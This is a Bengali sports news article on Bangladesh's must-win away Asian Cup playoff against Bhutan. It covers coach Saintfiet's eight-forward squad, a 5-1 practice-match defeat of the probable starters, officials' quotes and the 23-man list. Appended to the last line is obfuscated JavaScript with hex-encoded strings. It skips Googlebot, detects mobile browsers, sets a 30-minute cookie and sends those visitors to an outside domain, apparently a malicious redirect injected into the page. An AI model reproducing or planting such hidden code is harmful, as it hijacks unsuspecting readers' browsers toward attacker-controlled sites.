‘ভুটানকে হারাতেই হবে’

bff
ফুটবল অঙ্গনে এখন আলোচনায় একটাই নাম ‘ভুটান’। ছোট্ট দেশ। অথচ এ ভুটানই এখন বাংলাদেশের সামনে পাহাড়সম। ফুটবলার, কোচ, অফিসিয়াল থেকে শুরু করে বাফুফে সভাপতি কাজী মো. সালাউদ্দিন-সবার চোখ থিম্পুতে। আগামী ১০ অক্টো্বর ভুটানের রাজধানীতে যে লেখা হবে বাংলাদেশ ফুটবলের আগামী দিনের ভাগ্য। এশিয়ান কাপ প্লে-অফ-২ এর অ্যাওয়ে ম্যাচটি বাংলাদেশের সামনে এত বড় হয়ে আসতো না, যদি হোম ম্যাচে যদি ভুটানকে হারানো যেতো। অনভ্যস্ত কাদা মাঠে বাংলাদেশকে গোলশূন্যভাবে রুখে দিয়ে বেশ সুবিধাজনক অবস্থানে থেকেই ঘরে খেলতে নামবে ভুটান। সমুদ্রপৃষ্ঠ থেকে ভুটানের উচ্চতা এবং টার্ফের মাঠ-বাংলাদেশের সামনে বড় প্রতিবন্ধকতা। এ ম্যাচ জিততে সব ধরনের কৌশল নিচ্ছেন জাতীয় দলের বেলজিয়ান কোচ সেইন্টফিট। ভুটান সফরের জন্য ২৩ সদস্যের দলও ঘোষণা করেছেন তিনি।

সেইন্টফিটের খেলোয়াড় তালিকা দেখলেই পরিস্কার গোলের জন্য কতটা মরিয়া তিনি। স্কোয়াড সাজিয়েছেন ৮ জন ফরোয়ার্ড নিয়ে। ফিরিয়ে এনেছেন বেশ কিছুদিন থেকে দলের বাইরে থাকা জাহিদ হাসান এমিলি ও এনামুলক হককে। এ দুই অভিজ্ঞের সঙ্গে আছে হালের তরুন ফরোয়ার্ডরা। গোল যে পেতেই হবে ভুটানের বিপক্ষে। রাগে, অভিমানে জাতীয় দল থেকে অবসর ঘোষণা দেয়া মামুনুল ইসলামকেও তিনি রেখেছেন ভুটানগামী দলে। অভিজ্ঞ আর তারুণ্যের মিশেল একটি দল নিয়ে ভুটানবধের পরিকল্পনা সেঁটেছেন। কিন্তু পারবেন কি? এইতো আজই ক্যাম্পের খেলোয়াড়দের দুইভাগ করে একটি প্রস্তুতি ম্যাচ খেলিয়েছেন সেইন্টফিট। সম্ভাব্য মূল একাদশের প্রতিপক্ষ ছিল বাকিরা। ফল কি হয়েছে জানেন? মূল দল হেরেছে ৫-১ গোলে! এ খবরটি জেনে বাফুফে সভাপতি কাজী সালাউদ্দিনতো আকাশ থেকে পড়েছেন ‘তাই নাকি? এটা কি করে হয়। এক গোলে হারতেও পারে। তাই বলে ৫ গোল? তাহলেতো আর কোনো আশা দেখছি না।’ আসলে আশার ১২ টা তো বেজেছে হোম ম্যাচেই। এখন দেয়ালে পিঠ ঠেকা দল ভুটানের মাটিতে গিয়ে কি করে সেটাই দেখার বিষয়।

দুটি পথ খোলা বাংলাদেশের সামনে। জিতলেতো আর কোনো হিসেবের প্রয়োজন নেই। এমন কি গোলে ড্র হলেও। মানে ম্যাচটি যদি ১-১, ২-২ ….এভাবে ড্র হয়। নির্ধারিত নব্বই মিনিট গোলশূন্য থাকলে ম্যাচটি গড়াবে অতিরিক্ত সময়ে। অতিরিক্ত সময়েও কোনো দল জিতলে না পারলে টাইব্রেকারে নির্ধারণ হবে এ ম্যাচের ভাগ্য। আরকেটি তথ্য হলো-অতিরিক্ত সময়ের ম্যাচ গোলশূন্য কিংবা গোলে, যেভাবেই ড্র হোক টাইব্রেকারেই নির্ধারণ হবে ভাগ্য।

এসব নিয়ে ভাবতে চাননি কোচ সেইন্টফিট। দল ঘোষণার পর সংবাদ সম্মেলনে বলেছেন,‘এটা মাস্টউইন ম্যাচ। আমাদের জিততেই হবে।’জিতলে হলেতো গোল করতে হবে। কিন্তু বিড়ালের গলায় ঘন্টা বাধার মতো গোল করবেন কে? এ প্রশ্নের উত্তর খুঁজতেই খেলোয়াড় তালিকায় ফরোয়ার্ডদের মিছিল বানিয়ে ফেলেছেন কোচ। সাখাওয়াত রনি, জুয়েল রানা, রুবেল মিয়া, হেমন্ত আর জাফর ইকবালরা লিগে গোল করে পাশ করেছেন সেইন্টফিটের পরীক্ষায়। কিন্তু এমিলি? তাকে রাখা হয়েছে ‘অতীত’ দেখে। সংবাদ সম্মেলনে কোচ বলেছেন,‘এমিলি কিছুদিন খেলায় ছিলেন না ইনজুরির কারণে। কিন্তু গত ১০ বছরে সে জাতীয় দলের হয়ে অনেক গোল করেছে। এখন ফিট আছে। তাই তার অভিজ্ঞতাও কাজে আসতে পারে।’

দলে কোনো ডিফেন্সিভ মিডফিল্ডার নেই। কোচের ব্যাখ্যা‘বাংলাদেশের ডিফেন্স হবে ‘কমপ্যাক্ট’। যেখানে কোনও ফাক-ফোকড় থাকবে না। ভুটানের পক্ষে থাকবে মাঠের সবকিছু। ১৫ হাজার দর্শক, উচ্চতা, কৃত্রিম টার্ফ; তবে এজন্য হাল ছেড়ে দেওয়ার কোনও মানে নেই। বাংলাদেশ ভুটানে যাচ্ছে ম্যাচ জেতার জন্য। আর এই ম্যাচে বাংলাদেশকে জিততেই হবে। ৩৬ জন খেলোয়াড়ের মাঝ থেকে ২৩ জন খেলোয়াড়কে বাছাই করার কাজটি সহজ ছিল না। খেলোয়াড়দের বাছাই করা হয়েছে ভুটানের কন্ডিশন, লিগে তাদের পারফরম্যান্স, জাতীয় দলের হয়ে তাদের রেকর্ড ও সর্বোপরি কোচের কৌশল বিবেচনা করেই।’

দল ঘোষণা হলেও দলের অধিনায়ক এখনও চূড়ান্ত করেনি টিম ম্যানেজমেন্ট। এ প্রসঙ্গে ন্যাশনাল টিমস কমিটির চেয়ারম্যান কাজী নাবিল আহমেদ বলেছেন, ‘দল চূড়ান্ত হলেও এখনও কিছু হাল্কা ইনজুরি সমস্যা আছে। যেটি এ মুহূর্তে আমাদের অধিনায়ক চূড়ান্ত করতে বাধা দিচ্ছে। তবে আমরা দল যাত্র শুরু করার আগেই বিষয়টি জানিয়ে দেবো।’ইনজুরি আছে বলে ২৩ জনের বাইরে অপেক্ষমানের তালিকায় রাখা হয়েছে ৩ জনকে।

২৩ সদস্যের জাতীয় ফুটবল দল
গোলরক্ষক : আশরাফুল ইসলাম রানা, মামুন খান, নেহাল। রক্ষণ : তপু বর্মণ, আতিকুর রহমান ফাহাদ, আতিকুর রহমান মিশু, রায়হান হাসান, রেজাউল করিম, মামুন মিয়া, এনামুল হক শরিফ। মাঝমাঠ : হেমন্ত ভিনসেন্ট, মামুনুল ইসলাম, ইমন মাহমুদ, সোহেল রানা, মোহাম্মদ আবদুল্লাহ। ফরোয়ার্ড : রুবেল মিয়া, এনামুল হক, জুয়েল রানা, মোহাম্মদ সোহেল রানা, জাফর ইকবাল, মেহবুব হোসেন নয়ন, জাহিদ হাসান এমিলি ও শাখাওয়াত রনি।

স্ট্যান্ডবাই : ইয়ামিন মুন্না, মনসুর আমিন ও মাসুক মিয়া জনি।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}